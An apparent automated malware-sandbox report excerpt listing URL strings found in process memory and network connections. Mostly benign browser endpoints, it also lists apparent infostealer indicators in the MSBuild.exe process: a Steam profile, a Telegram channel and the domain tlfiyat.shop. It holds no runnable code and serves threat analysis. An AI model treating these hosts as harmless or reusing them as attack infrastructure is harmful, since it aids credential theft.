Source: chrome.exe, 00000005.00000002.2637632737.000077B000988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cdn.office.net/
Source: chrome.exe, 00000005.00000002.2632852975.000077B0000AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695418792.000041B002A68000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694841991.000041B002A28000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695338331.000041B002A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sapphire.azureedge.net
Source: chrome.exe, 00000005.00000002.2632651148.000077B000074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000005.00000002.2636873282.000077B0007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2636873282.000077B0007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000005.00000003.2563151785.000077B000294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000005.00000003.2577203204.000077B000454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unins000.exe, 00000000.00000002.2404445235.0000000003C22000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662
Source: MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199819539662go2dnizMozilla/5.0
Source: msedge.exe, 00000009.00000003.2688847669.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685670262.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows-ppe.net/
Source: msedge.exe, 00000009.00000003.2688847669.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685670262.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sts.windows.net/
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phell
Source: MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/sc1phellgo2dnizMozilla/5.0
Source: chrome.exe, 00000005.00000002.2638012665.000077B000A40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tlfiyat.shop/5
Source: msedge.exe, 00000009.00000003.2707008237.0000023356D7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.2707008237.0000023356D7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: msedge.exe, 00000009.00000003.2707008237.0000023356D7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: MSBuild.exe, 00000003.00000002.2902111510.00000000014A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.clarity.ms
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638337333.000077B000AF8000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000005.00000002.2641377259.000077B0010B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000005.00000003.2563151785.000077B000294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552682813.000077B000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2553786717.000077B000C20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000005.00000003.2548103148.000077B0004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2554201930.000077B000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000005.00000002.2637054242.000077B00081C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char(l3
Source: chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Charw
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000005.00000002.2636162030.000077B0006D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000005.00000002.2637590709.000077B000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2637133993.000077B000854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000005.00000002.2637590709.000077B000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2637133993.000077B000854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gsOpen
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635334509.000077B000544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635432687.000077B0005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688847669.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685670262.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msedge.exe, 00000009.00000003.2688847669.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685670262.000041B0003D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoarchTerms
Source: chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icow
Source: chrome.exe, 00000005.00000003.2577203204.000077B000454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
Source: chrome.exe, 00000005.00000003.2577203204.000077B000454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000005.00000003.2564602281.000077B00040C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000005.00000002.2638189784.000077B000A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2632279648.000077B000014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: chromecache_156.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_156.7.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000005.00000003.2590619460.000077B001AA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2590687580.000077B001AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2590537293.000077B001AA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2590890957.000077B001AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2591053377.000077B001ABC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2590986721.000077B001AB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2590769114.000077B001AB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: chrome.exe, 00000005.00000002.2633834872.000077B0002B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000005.00000002.2641377259.000077B0010B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000005.00000002.2641377259.000077B0010B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000005.00000002.2635237462.000077B000508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000005.00000003.2578513752.000077B00160C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.2578562286.000077B001628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578729102.000077B0016F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2577887678.000077B0016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578303487.000077B001658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2643883590.000077B001660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578513752.000077B00160C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.2578513752.000077B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578226524.000077B001678000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000005.00000003.2578513752.000077B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578226524.000077B001678000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: unins000.exe, 00000000.00000000.2067232117.0000000000581000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.innosetup.com/
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.microsoftstart.com
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: MSBuild.exe, 00000003.00000002.2914197713.0000000004726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.cn
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: unins000.exe, 00000000.00000000.2067232117.0000000000581000.00000020.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2641965877.000077B0010D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000005.00000002.2641965877.000077B0010D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635728849.000077B00061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2639675930.000077B000D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636045339.000077B000698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP
Source: chrome.exe, 00000005.00000002.2639675930.000077B000D74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
Source: chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlnjb
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
